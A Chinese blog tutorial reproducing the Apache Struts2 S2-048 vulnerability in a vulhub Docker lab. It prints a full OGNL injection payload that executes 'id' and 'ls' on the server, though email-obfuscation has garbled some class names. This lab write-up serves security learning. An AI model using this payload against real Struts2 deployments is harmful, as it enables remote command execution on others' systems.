漏洞复现篇——Struts2反序列化漏洞

时间  2021-01-17 标签 渗透测试

Struts2是什么?
Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序
这套 Struts2 入门教程对 Struts2 框架进行了讲解,采用基础知识与案例相结合的编写方式,使读者更容易的学以致用。学习本课程前需要具备 Java Web 基础,熟悉 JSP 和 Servlet。

在这里插入图片描述

实验环境:

  • 火狐浏览器
  • Struts2
  • Ubuntu虚拟机

在这里插入图片描述

模拟实验:

1、开启漏洞环境

首先进入到/vulhub-master/struts2/s2-048目录
在这里插入图片描述
然后切换root用户,输入docker-compose up -d启动s2-048的漏洞环境
在这里插入图片描述
然后查看本机IP
在这里插入图片描述

2、利用漏洞

在火狐中访问http://你的IP:8080/showcase,然后依次点击图示位置在这里插入图片描述
来到这样一个界面,然后输入${10*233}提交
在这里插入图片描述
输出结果正确并提交
在这里插入图片描述
再输入%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@[email protected]().exec('id').getInputStream())).(#q)}试试
在这里插入图片描述
id命令执行成功
在这里插入图片描述
换ls试一下依然成功
在这里插入图片描述
在这里插入图片描述

总结

这个版本的漏洞只能执行id/ls/dir/whoami/echo等简单的命令

联系我们 沪ICP备13005482号-10